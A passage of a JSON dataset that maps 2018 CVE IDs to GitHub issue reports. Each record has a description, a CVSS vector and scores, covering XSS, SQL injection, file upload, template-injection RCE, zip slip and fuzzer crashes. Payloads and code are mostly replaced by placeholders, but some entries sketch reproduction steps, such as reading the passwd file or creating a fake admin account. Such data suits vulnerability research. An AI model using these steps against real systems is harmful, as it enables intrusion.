  28712. "description": "global buffer overflow in the function i2alaw_array and i2ulaw_array. version x] libsndfile: Version released NUMBERTAG libsndfile NUMBERTAG pre1. description An issue was discovered in libsndfile NUMBERTAG There is a global buffer overflow at the function i2alaw_array and i2ulaw_array, will lead to a denial of service or the others. similar this [issue URLTAG but occur at the function i2alaw_array and i2ulaw_array . target APITAG ASAN report ERRORTAG and ERRORTAG FILETAG",
  28713. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  28714. "severity": "MEDIUM",
  28715. "baseScore": 6.5,
  28716. "impactScore": 3.6,
  28717. "exploitabilityScore": 2.8
  28718. },
  28719. {
  28720. "CVE_ID": "CVE-2018-19664",
  28721. "Issue_Url_old": "https://github.com/libjpeg-turbo/libjpeg-turbo/issues/305",
  28722. "Issue_Url_new": "https://github.com/libjpeg-turbo/libjpeg-turbo/issues/305",
  28723. "Repo_new": "libjpeg-turbo/libjpeg-turbo",
  28724. "Issue_Created_At": "2018-11-27T07:35:12Z",
  28725. "description": "heap buffer overflow in function put_pixel_rows in APITAG ERRORTAG FILETAG",
  28726. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  28727. "severity": "MEDIUM",
  28728. "baseScore": 6.5,
  28729. "impactScore": 3.6,
  28730. "exploitabilityScore": 2.8
  28731. },
  28732. {
  28733. "CVE_ID": "CVE-2018-19692",
  28734. "Issue_Url_old": "https://github.com/fmsdwifull/tp5cms/issues/5",
  28735. "Issue_Url_new": "https://github.com/fmsdwifull/tp5cms/issues/5",
  28736. "Repo_new": "fmsdwifull/tp5cms",
  28737. "Issue_Created_At": "2018-11-29T09:39:55Z",
  28738. "description": "tp5cms In the photo upload function position can upload any type of document. tp5cms In the photo upload function position can upload any type of document (including PHP) In the location of the upload pictures, the type of the image replacement for other types payload\uff1a ERRORTAG Return \uff1a CODETAG",
  28739. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  28740. "severity": "CRITICAL",
  28741. "baseScore": 9.8,
  28742. "impactScore": 5.9,
  28743. "exploitabilityScore": 3.9
  28744. },
  28745. {
  28746. "CVE_ID": "CVE-2018-19693",
  28747. "Issue_Url_old": "https://github.com/fmsdwifull/tp5cms/issues/6",
  28748. "Issue_Url_new": "https://github.com/fmsdwifull/tp5cms/issues/6",
  28749. "Repo_new": "fmsdwifull/tp5cms",
  28750. "Issue_Created_At": "2018-11-29T10:05:25Z",
  28751. "description": "System setting position exists an XSS vulnerability. System setting position exists an XSS vulnerability poc\uff1a ERRORTAG location: ERRORTAG",
  28752. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
  28753. "severity": "MEDIUM",
  28754. "baseScore": 6.1,
  28755. "impactScore": 2.7,
  28756. "exploitabilityScore": 2.8
  28757. },
  28758. {
  28759. "CVE_ID": "CVE-2018-19749",
  28760. "Issue_Url_old": "https://github.com/domainmod/domainmod/issues/81",
  28761. "Issue_Url_new": "https://github.com/domainmod/domainmod/issues/81",
  28762. "Repo_new": "domainmod/domainmod",
  28763. "Issue_Created_At": "2018-11-23T09:37:23Z",
  28764. "description": "Stored XSS vulnerability in Account Owners (owner name). Stored XSS vulnerability in Version NUMBERTAG which allows remote attacker to inject arbitrary script or html. This being stored, will impact all users who have permissions to view the vulnerable page. Vulnerable Endpoint: FILETAG Steps NUMBERTAG goto vulnerable endpoint NUMBERTAG At the place of owner name put xss payload \"> APITAG POC attached",
  28765. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N",
  28766. "severity": "MEDIUM",
  28767. "baseScore": 4.8,
  28768. "impactScore": 2.7,
  28769. "exploitabilityScore": 1.7
  28770. },
  28771. {
  28772. "CVE_ID": "CVE-2018-19750",
  28773. "Issue_Url_old": "https://github.com/domainmod/domainmod/issues/82",
  28774. "Issue_Url_new": "https://github.com/domainmod/domainmod/issues/82",
  28775. "Repo_new": "domainmod/domainmod",
  28776. "Issue_Created_At": "2018-11-23T10:20:29Z",
  28777. "description": "Stored XSS vulnerability in Custom Domain Fields. Stored XSS vulnerability in Version NUMBERTAG which allows remote attacker to inject arbitrary script or html. This being stored, will impact all users who have permissions to view the vulnerable page. Vulnerable Endpoint: URLTAG Steps: goto vulnerable endpoint At the place of Display Name, Description, notes put xss payload \"> APITAG",
  28778. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N",
  28779. "severity": "MEDIUM",
  28780. "baseScore": 5.4,
  28781. "impactScore": 2.7,
  28782. "exploitabilityScore": 2.3
  28783. },
  28784. {
  28785. "CVE_ID": "CVE-2018-19752",
  28786. "Issue_Url_old": "https://github.com/domainmod/domainmod/issues/84",
  28787. "Issue_Url_new": "https://github.com/domainmod/domainmod/issues/84",
  28788. "Repo_new": "domainmod/domainmod",
  28789. "Issue_Created_At": "2018-11-23T10:47:19Z",
  28790. "description": "Cross Site Scripting APITAG XSS) vulnerability in PATHTAG Stored XSS vulnerability in Version NUMBERTAG which allows remote attacker to inject arbitrary script or html. This being stored, will impact all users who have permissions to view the vulnerable page. Vulnerable Endpoint: FILETAG Steps: Goto vulnerable endpoint At the place of Display Name, Description, notes put xss payload \"> APITAG",
  28791. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N",
  28792. "severity": "MEDIUM",
  28793. "baseScore": 4.8,
  28794. "impactScore": 2.7,
  28795. "exploitabilityScore": 1.7
  28796. },
  28797. {
  28798. "CVE_ID": "CVE-2018-19784",
  28799. "Issue_Url_old": "https://github.com/Athlon1600/php-proxy-app/issues/139",
  28800. "Issue_Url_new": "https://github.com/athlon1600/php-proxy-app/issues/139",
  28801. "Repo_new": "athlon1600/php-proxy-app",
  28802. "Issue_Created_At": "2018-11-30T03:09:48Z",
  28803. "description": "PHP Proxy APITAG APITAG Detailed steps and sample payload\uff1a URLTAG We suggest that the encryption rules should be strengthened because the logic of decryption is too easy.",
  28804. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N",
  28805. "severity": "HIGH",
  28806. "baseScore": 7.5,
  28807. "impactScore": 3.6,
  28808. "exploitabilityScore": 3.9
  28809. },
  28810. {
  28811. "CVE_ID": "CVE-2018-19791",
  28812. "Issue_Url_old": "https://github.com/litespeedtech/openlitespeed/issues/117",
  28813. "Issue_Url_new": "https://github.com/litespeedtech/openlitespeed/issues/117",
  28814. "Repo_new": "litespeedtech/openlitespeed",
  28815. "Issue_Created_At": "2018-11-28T11:30:15Z",
  28816. "description": "Vulnerabilities in Openlitespeed web server. These are vulnerabilities that were discovered during the APITAG source code for vulnerabilities\" workshop at Hack In The Box Dubai NUMBERTAG Denial of Service =================== The openlitespeed server does not correctly handle requests for byte sequences allowing an attacker to amplify the response size by requesting the entire response body repeatedly. The following curl request illustrates this issue: CODETAG Multiple buffer overflow APITAG There are a number of buffer overflows in the web server source code. While many require administrative access to alter configuration to trigger, the following example can be triggered by a local user: CODETAG The following proof of concept is offered to illustrate the buffer overflow: CODETAG",
  28817. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
  28818. "severity": "MEDIUM",
  28819. "baseScore": 6.5,
  28820. "impactScore": 3.6,
  28821. "exploitabilityScore": 2.8
  28822. },
  28823. {
  28824. "CVE_ID": "CVE-2018-19793",
  28825. "Issue_Url_old": "https://github.com/iwannay/jiacrontab/issues/28",
  28826. "Issue_Url_new": "https://github.com/iwannay/jiacrontab/issues/28",
  28827. "Repo_new": "iwannay/jiacrontab",
  28828. "Issue_Created_At": "2018-12-02T07:05:32Z",
  28829. "description": "Jiacrontab NUMBERTAG arbitrary code execution vulnerability. Test in the demo: FILETAG User: admin Password NUMBERTAG APITAG in APITAG task FILETAG Modify the values of command and args, Read the passwd file. > PATHTAG CODETAG NUMBERTAG Successfully added and run this task FILETAG APITAG NUMBERTAG Get echo FILETAG",
  28830. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H",
  28831. "severity": "HIGH",
  28832. "baseScore": 7.2,
  28833. "impactScore": 5.9,
  28834. "exploitabilityScore": 1.2
  28835. },
  28836. {
  28837. "CVE_ID": "CVE-2018-19797",
  28838. "Issue_Url_old": "https://github.com/sass/libsass/issues/2779",
  28839. "Issue_Url_new": "https://github.com/sass/libsass/issues/2779",
  28840. "Repo_new": "sass/libsass",
  28841. "Issue_Created_At": "2018-12-01T14:15:32Z",
  28842. "description": "Crash in APITAG function in version NUMBERTAG and latest. I found a crash by fuzzing libsass&sassc. It can be reproduced both in version NUMBERTAG and the master branch (accessed on PATHTAG ) code. Run sassc (built with APITAG with a special file sass_id NUMBERTAG URLTAG APITAG The outputs are as follows: ERRORTAG I found the cause is that in the APITAG function in ast.cpp (the function was moved to ast_selectors.cpp several days ago), the APITAG variable is NULL when coming to the crashing line (noted below). Adding a null check on APITAG indeed could fix the problem but not sure whether there are better ways. ERRORTAG",
  28843. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  28844. "severity": "MEDIUM",
  28845. "baseScore": 6.5,
  28846. "impactScore": 3.6,
  28847. "exploitabilityScore": 2.8
  28848. },
  28849. {
  28850. "CVE_ID": "CVE-2018-19826",
  28851. "Issue_Url_old": "https://github.com/sass/libsass/issues/2781",
  28852. "Issue_Url_new": "https://github.com/sass/libsass/issues/2781",
  28853. "Repo_new": "sass/libsass",
  28854. "Issue_Created_At": "2018-12-03T07:37:21Z",
  28855. "description": "Out of Memory (crash) with malformed input files APITAG an extra '/' or '&'). Some malformed input could cause the libsass/sassc program to run out of memory and crash. These malformed files are not big and are simply the original files with an extra '/' or '&' added (created by fuzzing). The problem can be reproduced both in version NUMBERTAG and the master branch (accessed on PATHTAG ) code. Sample malformed input files include URLTAG and URLTAG . Run APITAG sass_mem NUMBERTAG For example, sass_mem NUMBERTAG looks like below, where the ' & ' symbol before NUMBERTAG is extra: APITAG APITAG the sass_mem NUMBERTAG file, the '/' is added later URLTAG Call stack Since the program will crash, when I randomly stop the program, the call stack looks like below: CODETAG Where in APITAG ) at APITAG the APITAG line the s becomes a very long string ( APITAG ) and keeps increasing. It seems the program enters some endless loop. The memory footprint of the program grows quickly (to NUMBERTAG GB and above) and later the program is killed by the system.",
  28856. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  28857. "severity": "MEDIUM",
  28858. "baseScore": 6.5,
  28859. "impactScore": 3.6,
  28860. "exploitabilityScore": 2.8
  28861. },
  28862. {
  28863. "CVE_ID": "CVE-2018-19827",
  28864. "Issue_Url_old": "https://github.com/sass/libsass/issues/2782",
  28865. "Issue_Url_new": "https://github.com/sass/libsass/issues/2782",
  28866. "Repo_new": "sass/libsass",
  28867. "Issue_Created_At": "2018-12-03T12:05:02Z",
  28868. "description": "APITAG heap use after free in both libsass NUMBERTAG and latest codebase. I found a new heap use after free bug with a special sass file. The file causes a heap use after free bug in both version NUMBERTAG and the latest master branch (accessed on PATHTAG ) codebase, though with slightly different crash stacks. APITAG is quite different from previous issue URLTAG .) Build libsass/sassc with APITAG APITAG Run APITAG (sass_heap_UAF is at here: URLTAG The program crashes. APITAG Crash stack Crash in the latest code (accessed on PATHTAG ) ERRORTAG Crash in libsass NUMBERTAG ERRORTAG",
  28869. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  28870. "severity": "HIGH",
  28871. "baseScore": 8.8,
  28872. "impactScore": 5.9,
  28873. "exploitabilityScore": 2.8
  28874. },
  28875. {
  28876. "CVE_ID": "CVE-2018-19838",
  28877. "Issue_Url_old": "https://github.com/sass/libsass/issues/2660",
  28878. "Issue_Url_new": "https://github.com/sass/libsass/issues/2660",
  28879. "Repo_new": "sass/libsass",
  28880. "Issue_Created_At": "2018-06-02T07:32:14Z",
  28881. "description": "Stack overflow errors at IMPLEMENT_AST_OPERATORS expansion. We found with our fuzzer some stack overflow errors when executing on APITAG expansion inside ast.cpp (exact lines may differ in NUMBERTAG or NUMBERTAG when compiled with different optimizations, APITAG when compiled with Address Sanitizer (using sassc as the driver). ERRORTAG Sample input files: FILETAG FILETAG FILETAG",
  28882. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  28883. "severity": "MEDIUM",
  28884. "baseScore": 6.5,
  28885. "impactScore": 3.6,
  28886. "exploitabilityScore": 2.8
  28887. },
  28888. {
  28889. "CVE_ID": "CVE-2018-19839",
  28890. "Issue_Url_old": "https://github.com/sass/libsass/issues/2657",
  28891. "Issue_Url_new": "https://github.com/sass/libsass/issues/2657",
  28892. "Repo_new": "sass/libsass",
  28893. "Issue_Created_At": "2018-06-02T07:01:37Z",
  28894. "description": "Buffer Overflow against some invalid input. We found with our fuzzer some buffer overflow errors against some invalid inputs. ERRORTAG sample input files: FILETAG FILETAG FILETAG",
  28895. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  28896. "severity": "MEDIUM",
  28897. "baseScore": 6.5,
  28898. "impactScore": 3.6,
  28899. "exploitabilityScore": 2.8
  28900. },
  28901. {
  28902. "CVE_ID": "CVE-2018-19841",
  28903. "Issue_Url_old": "https://github.com/dbry/WavPack/issues/54",
  28904. "Issue_Url_new": "https://github.com/dbry/wavpack/issues/54",
  28905. "Repo_new": "dbry/wavpack",
  28906. "Issue_Created_At": "2018-11-29T08:01:53Z",
  28907. "description": "APITAG heap buffer overflow APITAG OOB) at APITAG As of NUMBERTAG when running ERRORTAG , it may result in an read out of bound error on variable dp inside APITAG (blind decode mode is ok). ERRORTAG POCs: FILETAG",
  28908. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  28909. "severity": "MEDIUM",
  28910. "baseScore": 5.5,
  28911. "impactScore": 3.6,
  28912. "exploitabilityScore": 1.8
  28913. },
  28914. {
  28915. "CVE_ID": "CVE-2018-19842",
  28916. "Issue_Url_old": "https://github.com/radare/radare2/issues/12239",
  28917. "Issue_Url_new": "https://github.com/radareorg/radare2/issues/12239",
  28918. "Repo_new": "radareorg/radare2",
  28919. "Issue_Created_At": "2018-11-20T10:10:46Z",
  28920. "description": "rasm2 built with ASAN reported a stackoverflow during assembling. Work environment | Questions | Answers | | | PATHTAG (mandatory) | Ubuntu NUMBERTAG File format of the file you reverse (mandatory) | | Architecture/bits of the file (mandatory) | txt | r2 v full output, not truncated (mandatory) | rasm NUMBERTAG git NUMBERTAG linu NUMBERTAG APITAG NUMBERTAG gdd NUMBERTAG bfe3d commit: APITAG build NUMBERTAG Expected behavior rasm2 exits with an error message. Actual behavior rasm2 crashes with the error message that suggests it's a stack overflow relevant to APITAG ; I'm not sure whether it's reporting correctly since that array is then duplicated and accessed with the duplicated one. ERRORTAG Steps to reproduce the behavior Build APITAG with ASAN Run APITAG",
  28921. "vectorString": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  28922. "severity": "MEDIUM",
  28923. "baseScore": 5.5,
  28924. "impactScore": 3.6,
  28925. "exploitabilityScore": 1.8
  28926. },
  28927. {
  28928. "CVE_ID": "CVE-2018-19843",
  28929. "Issue_Url_old": "https://github.com/radare/radare2/issues/12242",
  28930. "Issue_Url_new": "https://github.com/radareorg/radare2/issues/12242",
  28931. "Repo_new": "radareorg/radare2",
  28932. "Issue_Created_At": "2018-11-20T13:38:24Z",
  28933. "description": "APITAG global buffer overflow at APITAG Work environment | Questions | Answers | | | PATHTAG (mandatory) | Ubuntu NUMBERTAG File format of the file you reverse (mandatory) | txt | Architecture/bits of the file (mandatory) | | r2 v full output, not truncated (mandatory) | rasm NUMBERTAG git NUMBERTAG linu NUMBERTAG APITAG NUMBERTAG gdd NUMBERTAG bfe3d commit: APITAG build NUMBERTAG Expected behavior rasm2 exits with error message. Actual behavior rasm2 crashes. ERRORTAG Steps to reproduce the behavior Build radare with ASAN run APITAG Additional Logs, screenshots, source code, configuration dump, ... The offset calculated is beyond the bound of APITAG . CODETAG",
  28934. "vectorString": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  28935. "severity": "MEDIUM",
  28936. "baseScore": 5.5,
  28937. "impactScore": 3.6,
  28938. "exploitabilityScore": 1.8
  28939. },
  28940. {
  28941. "CVE_ID": "CVE-2018-19853",
  28942. "Issue_Url_old": "https://github.com/liu946/hitshop/issues/1",
  28943. "Issue_Url_new": "https://github.com/liu946/hitshop/issues/1",
  28944. "Repo_new": "liu946/hitshop",
  28945. "Issue_Created_At": "2018-11-18T10:46:33Z",
  28946. "description": "There is an Elevation of privilege vulnerability that can control the whole website. An issue was discovered in hitshop NUMBERTAG beta. There is an Elevation of privilege vulnerability which allows control of the whole website Vulnerability trigger point URLTAG APITAG a normal store keeper FILETAG APITAG use store keeper jurisdiction\uff0cnow we just have the privilege of commodity management. FILETAG APITAG this account add the other administrator privilege account FILETAG APITAG the fake admin account\uff0cand now you have all system privilege. FILETAG You can change the old administrators' password or any other info of this website FILETAG",
  28947. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
  28948. "severity": "HIGH",
  28949. "baseScore": 8.8,
  28950. "impactScore": 5.9,
  28951. "exploitabilityScore": 2.8
  28952. },
  28953. {
  28954. "CVE_ID": "CVE-2018-19859",
  28955. "Issue_Url_old": "https://github.com/OpenRefine/OpenRefine/issues/1840",
  28956. "Issue_Url_new": "https://github.com/openrefine/openrefine/issues/1840",
  28957. "Repo_new": "openrefine/openrefine",
  28958. "Issue_Created_At": "2018-11-20T17:14:08Z",
  28959. "description": "Directory traversal APITAG Slip\") vulnerability . Describe the bug It is possible to create files outside the temporary folder by importing a zip file containing files with relative paths. This can be used to create scripts and configurations at locations where they can be picked up by applications, other scripts or executed during start up. Additional information URLTAG To Reproduce Video (zipped video because GH extension restrictions) FILETAG Steps to reproduce the behavior: Create payload and start server on Linux APITAG Steps on openrefine NUMBERTAG Start openrefine ($ ./refine NUMBERTAG Click on APITAG Project NUMBERTAG Click on APITAG Addresses (URLs)\" (also possible through uploading a local zip file NUMBERTAG Insert a malicious URL, eg. FILETAG NUMBERTAG If the file does not exist, the malicious file is silently created If the file does exist, openrefine shows a stack trace (see below) on terminal Current Results No error nor warning. Expected behavior Warn the user about dangerous content in the zip and prevent the creation of the file. Video The video is inside a zip file because of github file extension restrictions. Desktop (please complete the following information): OS: Linux APITAG Debian) Browser Version: Not important JRE or JDK Version: ERRORTAG And ERRORTAG APITAG (please complete the following information): Version NUMBERTAG TRUNK] and NUMBERTAG beta [TRUNK] (maybe also previous versions) Stack trace ERRORTAG",
  28960. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:N",
  28961. "severity": "MEDIUM",
  28962. "baseScore": 6.5,
  28963. "impactScore": 3.6,
  28964. "exploitabilityScore": 2.8
  28965. },
  28966. {
  28967. "CVE_ID": "CVE-2018-19886",
  28968. "Issue_Url_old": "https://github.com/knik0/faac/issues/23",
  28969. "Issue_Url_new": "https://github.com/knik0/faac/issues/23",
  28970. "Repo_new": "knik0/faac",
  28971. "Issue_Created_At": "2018-12-05T03:52:43Z",
  28972. "description": "Invalid memory address dereference in huffcode (in APITAG . Hi, I found an issue in FAAC NUMBERTAG it is crashed by the function huffcode. It just causes an invalid memory address dereference. The details are below (ASAN): ERRORTAG POC FILE: URLTAG",
  28973. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  28974. "severity": "MEDIUM",
  28975. "baseScore": 5.5,
  28976. "impactScore": 3.6,
  28977. "exploitabilityScore": 1.8
  28978. },
  28979. {
  28980. "CVE_ID": "CVE-2018-19887",
  28981. "Issue_Url_old": "https://github.com/knik0/faac/issues/21",
  28982. "Issue_Url_new": "https://github.com/knik0/faac/issues/21",
  28983. "Repo_new": "knik0/faac",
  28984. "Issue_Created_At": "2018-12-05T03:47:42Z",
  28985. "description": "Invalid memory address dereference in huffcode (in APITAG . Hi, I found an issue in FAAC NUMBERTAG it is crashed by the function huffcode. It just causes an invalid memory address dereference. The details are below (ASAN): ERRORTAG POC FILE: URLTAG",
  28986. "vectorString": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  28987. "severity": "MEDIUM",
  28988. "baseScore": 5.5,
  28989. "impactScore": 3.6,
  28990. "exploitabilityScore": 1.8
  28991. },
  28992. {
  28993. "CVE_ID": "CVE-2018-19888",
  28994. "Issue_Url_old": "https://github.com/knik0/faac/issues/25",
  28995. "Issue_Url_new": "https://github.com/knik0/faac/issues/25",
  28996. "Repo_new": "knik0/faac",
  28997. "Issue_Created_At": "2018-12-05T03:57:32Z",
  28998. "description": "Invalid memory address dereference in huffcode (in APITAG Hi, I found an issue in FAAC NUMBERTAG it is crashed by the function huffcode. It just causes an invalid memory address dereference. The details are below (ASAN): ERRORTAG POC FILE: URLTAG",
  28999. "vectorString": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  29000. "severity": "MEDIUM",
  29001. "baseScore": 5.5,
  29002. "impactScore": 3.6,
  29003. "exploitabilityScore": 1.8
  29004. },
  29005. {
  29006. "CVE_ID": "CVE-2018-19889",
  29007. "Issue_Url_old": "https://github.com/knik0/faac/issues/22",
  29008. "Issue_Url_new": "https://github.com/knik0/faac/issues/22",
  29009. "Repo_new": "knik0/faac",
  29010. "Issue_Created_At": "2018-12-05T03:49:55Z",
  29011. "description": "Invalid memory address dereference in huffcode (in APITAG Hi, I found an issue in FAAC NUMBERTAG it is crashed by the function huffcode. It just causes an invalid memory address dereference. The details are below (ASAN): ERRORTAG POC FILE: URLTAG",
  29012. "vectorString": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  29013. "severity": "MEDIUM",
  29014. "baseScore": 5.5,
  29015. "impactScore": 3.6,
  29016. "exploitabilityScore": 1.8
  29017. },
  29018. {
  29019. "CVE_ID": "CVE-2018-19890",
  29020. "Issue_Url_old": "https://github.com/knik0/faac/issues/20",
  29021. "Issue_Url_new": "https://github.com/knik0/faac/issues/20",
  29022. "Repo_new": "knik0/faac",
  29023. "Issue_Created_At": "2018-12-05T03:41:25Z",
  29024. "description": "Invalid memory address dereference in huffcode (in APITAG Hi, I found an issue in FAAC NUMBERTAG it is crashed by the function huffcode. It just causes an invalid memory address dereference. The details are below (ASAN): ERRORTAG POC FILE: URLTAG",
  29025. "vectorString": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  29026. "severity": "MEDIUM",
  29027. "baseScore": 5.5,
  29028. "impactScore": 3.6,
  29029. "exploitabilityScore": 1.8
  29030. },
  29031. {
  29032. "CVE_ID": "CVE-2018-19891",
  29033. "Issue_Url_old": "https://github.com/knik0/faac/issues/24",
  29034. "Issue_Url_new": "https://github.com/knik0/faac/issues/24",
  29035. "Repo_new": "knik0/faac",
  29036. "Issue_Created_At": "2018-12-05T03:55:04Z",
  29037. "description": "Invalid memory address dereference in huffcode (in APITAG Hi, I found an issue in FAAC NUMBERTAG it is crashed by the function huffcode. It just causes an invalid memory address dereference. The details are below (ASAN): ERRORTAG POC FILE: URLTAG",
  29038. "vectorString": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  29039. "severity": "MEDIUM",
  29040. "baseScore": 5.5,
  29041. "impactScore": 3.6,
  29042. "exploitabilityScore": 1.8
  29043. },
  29044. {
  29045. "CVE_ID": "CVE-2018-19892",
  29046. "Issue_Url_old": "https://github.com/domainmod/domainmod/issues/85",
  29047. "Issue_Url_new": "https://github.com/domainmod/domainmod/issues/85",
  29048. "Repo_new": "domainmod/domainmod",
  29049. "Issue_Created_At": "2018-12-04T19:56:25Z",
  29050. "description": "Cross Site Scripting APITAG XSS) vulnerability in PATHTAG Stored XSS vulnerability in Version NUMBERTAG which allows remote attacker to inject arbitrary script or html. This being stored, will impact all users who have permissions to view the vulnerable page. Vulnerable Endpoint: FILETAG Steps: Goto vulnerable endpoint At the place of APITAG APITAG APITAG & notes put xss payload \"> APITAG FILETAG",
  29051. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N",
  29052. "severity": "MEDIUM",
  29053. "baseScore": 4.8,
  29054. "impactScore": 2.7,
  29055. "exploitabilityScore": 1.7
  29056. },
  29057. {
  29058. "CVE_ID": "CVE-2018-19893",
  29059. "Issue_Url_old": "https://github.com/Pbootcms/Pbootcms/issues/3",
  29060. "Issue_Url_new": "https://github.com/pbootcms/pbootcms/issues/3",
  29061. "Repo_new": "pbootcms/pbootcms",
  29062. "Issue_Created_At": "2018-12-04T10:40:04Z",
  29063. "description": "Pbootcms SQL injection in FILETAG . The default database is sqlite. For testing convenience, we need to replace the default database with the mysql database. the mysql database directory: PATHTAG FILETAG payload: URLTAG and we can get the admin account username and password",
  29064. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  29065. "severity": "CRITICAL",
  29066. "baseScore": 9.8,
  29067. "impactScore": 5.9,
  29068. "exploitabilityScore": 3.9
  29069. },
  29070. {
  29071. "CVE_ID": "CVE-2018-19906",
  29072. "Issue_Url_old": "https://github.com/smiffy6969/razorCMS/issues/56",
  29073. "Issue_Url_new": "https://github.com/smiffy6969/razorcms/issues/56",
  29074. "Repo_new": "smiffy6969/razorCMS",
  29075. "Issue_Created_At": "2018-11-03T04:55:58Z",
  29076. "description": "Stored XSS in Razor CMS. Affected software: Razor CMS version NUMBERTAG Type of vulnerability: XSS APITAG XSS) Discovered by: Provensec Website: FILETAG Author: Balvinder Singh Description: Razor CMS is prone to a Persistent Cross Site Scripting attack that allows a malicious user to inject HTML or scripts that can access any cookies, session tokens, or other sensitive information retained by your browser and used with that site. Vulnerable URL: URLTAG Vulnerable parameter: description Proof of concept: Step1: Login into the Razor cms. Step2: URL: URLTAG FILETAG Here the description parameter is vulnerable to XSS. Step3: Here the xss got executed for description parameter. URL: URLTAG FILETAG",
  29077. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N",
  29078. "severity": "MEDIUM",
  29079. "baseScore": 5.4,
  29080. "impactScore": 2.7,
  29081. "exploitabilityScore": 2.3
  29082. },
  29083. {
  29084. "CVE_ID": "CVE-2018-19907",
  29085. "Issue_Url_old": "https://github.com/craftercms/craftercms/issues/2677",
  29086. "Issue_Url_new": "https://github.com/craftercms/craftercms/issues/2677",
  29087. "Repo_new": "craftercms/craftercms",
  29088. "Issue_Created_At": "2018-12-05T02:18:39Z",
  29089. "description": "Critical vulnerability: Server Side Template Injection/ RCE Attack. Describe the bug Attackers may execute OS commands by APITAG a template file (.ftl filetype) which use APITAG lib to render webpage. To Reproduce Steps to reproduce the behavior NUMBERTAG Edit a template file FILETAG NUMBERTAG Add code as shown below and OK FILETAG NUMBERTAG iew web page, Window OS command was executed APITAG on windows) FILETAG Specs Version NUMBERTAG OS Windows Browser Firefox",
  29090. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
  29091. "severity": "HIGH",
  29092. "baseScore": 8.8,
  29093. "impactScore": 5.9,
  29094. "exploitabilityScore": 2.8
  29095. },
  29096. {
  29097. "CVE_ID": "CVE-2018-19913",
  29098. "Issue_Url_old": "https://github.com/domainmod/domainmod/issues/86",
  29099. "Issue_Url_new": "https://github.com/domainmod/domainmod/issues/86",
  29100. "Repo_new": "domainmod/domainmod",
  29101. "Issue_Created_At": "2018-12-06T07:08:05Z",
  29102. "description": "Cross Site Scripting APITAG XSS) vulnerability in PATHTAG Stored XSS vulnerability in Version NUMBERTAG which allows remote attacker to inject arbitrary script or html. This being stored, will impact all users who have permissions to view the vulnerable page. Vulnerable Endpoint: FILETAG Steps: Goto vulnerable endpoint At the place of APITAG Reseller ID & notes put xss payload \"> APITAG FILETAG",
  29103. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N",
  29104. "severity": "MEDIUM",
  29105. "baseScore": 4.8,
  29106. "impactScore": 2.7,
  29107. "exploitabilityScore": 1.7
  29108. },
  29109. {
  29110. "CVE_ID": "CVE-2018-19914",
  29111. "Issue_Url_old": "https://github.com/domainmod/domainmod/issues/87",
  29112. "Issue_Url_new": "https://github.com/domainmod/domainmod/issues/87",
  29113. "Repo_new": "domainmod/domainmod",
  29114. "Issue_Created_At": "2018-12-06T08:38:47Z",
  29115. "description": "Cross Site Scripting Vulnerability in APITAG NUMBERTAG Stored XSS vulnerability in Version NUMBERTAG which allows remote attacker to inject arbitrary script or html. This being stored, will impact all users who have permissions to view the vulnerable page. Vulnerable Endpoint: FILETAG Steps: Goto vulnerable endpoint PATHTAG At the place of Profile Name & notes put xss payload \"> APITAG FILETAG",
  29116. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N",
  29117. "severity": "MEDIUM",
  29118. "baseScore": 4.8,
  29119. "impactScore": 2.7,
  29120. "exploitabilityScore": 1.7
  29121. },
  29122. {
  29123. "CVE_ID": "CVE-2018-19918",
  29124. "Issue_Url_old": "https://github.com/CuppaCMS/CuppaCMS/issues/3",
